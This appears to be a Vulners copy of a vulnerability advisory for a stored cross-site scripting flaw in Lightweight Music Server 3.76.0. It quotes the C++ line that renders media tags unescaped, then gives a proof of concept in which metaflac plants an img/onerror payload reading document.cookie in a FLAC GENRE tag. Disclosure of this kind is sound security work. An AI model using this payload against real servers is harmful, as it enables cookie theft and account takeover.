Vulners
Lucene search
Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2026-48559 | 1 Jun 202613:15 | – | attackerkb |
 | Lightweight Music Server 跨站脚本漏洞 | 1 Jun 202600:00 | – | cnnvd |
 | CVE-2026-48559 | 1 Jun 202613:15 | – | cve |
 | CVE-2026-48559 Lightweight Music Server 3.76.0 Stored XSS via Media File Metadata Tags | 1 Jun 202613:15 | – | cvelist |
 | EUVD-2026-33640 | 1 Jun 202613:15 | – | euvd |
 | CVE-2026-48559 | 1 Jun 202615:16 | – | nvd |
 | PT-2026-45437 | 1 Jun 202600:00 | – | ptsecurity |
 | CVE-2026-48559 | 5 Jun 202619:26 | – | redhatcve |
 | CVE-2026-48559 Lightweight Music Server 3.76.0 Stored XSS via Media File Metadata Tags | 1 Jun 202613:15 | – | vulnrichment |
<html><body><p>Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS
Vendor: Emeric Poupon
Product web page: https://github.com/epoupon/lms
Affected version 3.76.0
Summary: LMS (Lightweight Music Server): A specific C++ based
project focused on a low memory footprint, featuring built-in
user management and a recommendation engine.
Desc: LMS stores media file metadata tags (such as GENRE, ARTIST,
and ALBUM) exactly as written in the file and later renders them
in its web interface without HTML-encoding, resulting in stored
cross-site scripting. An attacker who gets a file with a malicious
tag into the victim's library has their payload saved during the
next library scan and executed automatically whenever a user views
that track's information or plays the file in the web UI.
--------------------------------------------------------------
/src/lms/ui/Utils.cpp
---------------------
131: std::unique_ptr<wt::winteractwidget> createFilter(const Wt::WString& name, const Wt::WString& tooltip, std::string_view colorStyleClass, bool canDelete)
132: {
133: auto res{ std::make_unique<wt::wtext>(Wt::WString{ canDelete ? "<i class='\"fa' fa-times-circle=""></i> " : "" } + name, Wt::TextFormat::UnsafeXHTML) };
134: res->setStyleClass("Lms-badge-cluster badge me-1 " + std::string{ colorStyleClass });
135: res->setInline(true);
136: return res;
137: }
--------------------------------------------------------------
Tested on: GNU/Linux (ARM64)
nginx
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5987
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5987
27.05.2026
--
$ metaflac --set-tag=GENRE="<img onerror="alert(document.cookie)" src="1"/>" evil.flac
$ metaflac --list evil.flac
METADATA block #0
type: 0 (STREAMINFO)
is last: false
length: 34
minimum blocksize: 4608 samples
maximum blocksize: 4608 samples
minimum framesize: 2305 bytes
maximum framesize: 14124 bytes
sample_rate: 44100 Hz
channels: 2
bits-per-sample: 16
total samples: 4664587
MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d
METADATA block #1
type: 4 (VORBIS_COMMENT)
is last: false
length: 98
vendor string: Lavf57.83.100
comments: 2
comment[0]: encoder=Lavf57.83.100
comment[1]: GENRE=<img onerror="alert(document.cookie)" src="1"/>
METADATA block #2
type: 1 (PADDING)
is last: true
length: 8140
</wt::wtext></wt::winteractwidget></p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 May 2026 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 45.1
CVSS 3.15.4
EPSS0.00171
SSVC